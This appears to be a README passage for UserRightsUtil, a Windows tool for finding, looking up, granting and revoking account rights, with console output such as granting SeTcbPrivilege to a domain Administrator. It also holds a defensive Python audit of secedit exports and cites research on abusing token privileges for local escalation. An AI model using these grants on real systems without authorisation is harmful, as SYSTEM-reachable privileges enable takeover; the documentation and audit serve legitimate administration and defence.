C:\dev>UserRightsUtil.exe -m find -r debug
[>] Trying to find users with SeDebugPrivilege.
[+] Found 1 user(s).
|-> BUILTIN\Administrators (SID : S-1-5-32-544, Type : SidTypeAlias)
[*] Done.
To list the available values for the `-r` option, use the `-l` option:
C:\dev>UserRightsUtil.exe -m find -l
Available values for --right option:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
lookup Module
This command is to look up an account SID as follows:
C:\dev>UserRightsUtil.exe -m lookup -d contoso -u david
[*] Result:
|-> Account Name : CONTOSO\david
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1104
|-> Account Type : SidTypeUser
C:\dev>UserRightsUtil.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500
[*] Result:
|-> Account Name : CONTOSO\Administrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
|-> Account Type : SidTypeUser
C:\dev>UserRightsUtil.exe -m lookup -d contoso -u "domain admins"
[*] Result:
|-> Account Name : CONTOSO\Domain Admins
|-> SID : S-1-5-21-3654360273-254804765-2004310818-512
|-> Account Type : SidTypeGroup
If you don't specify a domain name with the `-d` option, the local computer name is used as the domain name:
C:\dev>hostname
CL01
C:\dev>UserRightsUtil.exe -m lookup -u admin
[*] Result:
|-> Account Name : CL01\admin
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-500
|-> Account Type : SidTypeUser
manage Module
This command is to grant or revoke user rights for a specific user account.
To grant a user right, specify the user right as the value for the `-g` option:
C:\dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
C:\dev>UserRightsUtil.exe -m manage -g tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSO\Administrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to grant SeTcbPrivilege.
[+] SeTcbPrivilege is granted successfully.
C:\dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSO\Administrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
To revoke a user right, specify the user right as the value for the `-r` option:
C:\dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSO\Administrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
C:\dev>UserRightsUtil.exe -m manage -r tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSO\Administrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to revoke SeTcbPrivilege
[+] SeTcbPrivilege is revoked successfully.
C:\dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
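As an added example (not part of UserRightsUtil), this Python audits the `[Privilege Rights]` section of a `secedit /export /cfg <file>` policy file for grants outside an expected baseline, which is how a defender would catch a grant like the `SeTcbPrivilege` one above. The export text, the baseline, and the assumed `Right = *SID,*SID` line format are constructed for the example; the Administrator SID is the one shown in the output above.

```python
# Constructed sample in the assumed format of the [Privilege Rights] section
# written by `secedit /export`, reflecting the state after the grant above:
# SeTcbPrivilege handed to CONTOSO\Administrator.
SAMPLE_SECEDIT_EXPORT = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeNetworkLogonRight = *S-1-1-0,*S-1-5-32-544,*S-1-5-32-545
SeDebugPrivilege = *S-1-5-32-544
SeTcbPrivilege = *S-1-5-21-3654360273-254804765-2004310818-500
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Constructed baseline of expected grantees per right (not a Microsoft
# default list). A right absent here is expected to be granted to nobody.
BASELINE = {
    "SeDebugPrivilege": {"S-1-5-32-544"},
    "SeImpersonatePrivilege": {"S-1-5-32-544", "S-1-5-6", "S-1-5-19", "S-1-5-20"},
    "SeNetworkLogonRight": {"S-1-1-0", "S-1-5-32-544", "S-1-5-32-545"},
}

# Rights whose holders can reach SYSTEM; the ones this README's tools exercise.
WATCHED_RIGHTS = (
    "SeTcbPrivilege", "SeCreateTokenPrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege", "SeImpersonatePrivilege", "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
)


def parse_privilege_rights(text):
    """Return {right: set of grantees} from the [Privilege Rights] section only."""
    rights, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):            # any section header starts/ends scope
            in_section = line == "[Privilege Rights]"
            continue
        if in_section and "=" in line:
            right, _, grantees = line.partition("=")
            # secedit prefixes SIDs with '*'; names (if any) carry no prefix.
            rights[right.strip()] = {
                g.strip().lstrip("*") for g in grantees.split(",") if g.strip()
            }
    return rights


def audit_user_rights(rights, baseline, watched=WATCHED_RIGHTS):
    """Return sorted (right, grantee) pairs granted outside the baseline."""
    findings = []
    for right in watched:
        unexpected = rights.get(right, set()) - baseline.get(right, set())
        findings.extend((right, grantee) for grantee in sorted(unexpected))
    return findings


if __name__ == "__main__":
    for right, grantee in audit_user_rights(
            parse_privilege_rights(SAMPLE_SECEDIT_EXPORT), BASELINE):
        print(f"[!] {right} granted to {grantee} outside baseline")
```

Resolve the reported SIDs with the `lookup` module above to see which account received the right.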
To list the available values for the `-g` or `-r` option, use the `-l` option:
C:\dev>UserRightsUtil.exe -m manage -l
Available values for --grant and --revoke options:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
Reference
- Priv2Admin and PSBits by Grzegorz Tworek
- Abusing Token Privileges For LPE by Bryan Alexander and Steve Breen
- whoami /priv by Andrea Pierini
- HackSys Extreme Vulnerable Driver by Ashfaq Ansari
Acknowledgments
Thanks for your advice about WinDbg extension programming:
- Pavel Yosifovich (@zodiacon)
Thanks for your notable research:
- Grzegorz Tworek (@0gtweet)
- Bryan Alexander (@dronesec)
- Steve Breen (@breenmachine)
- Andrea Pierini (@decoder_it)
Thanks for your sample kernel driver release:
- Ashfaq Ansari (@HackSysTeam)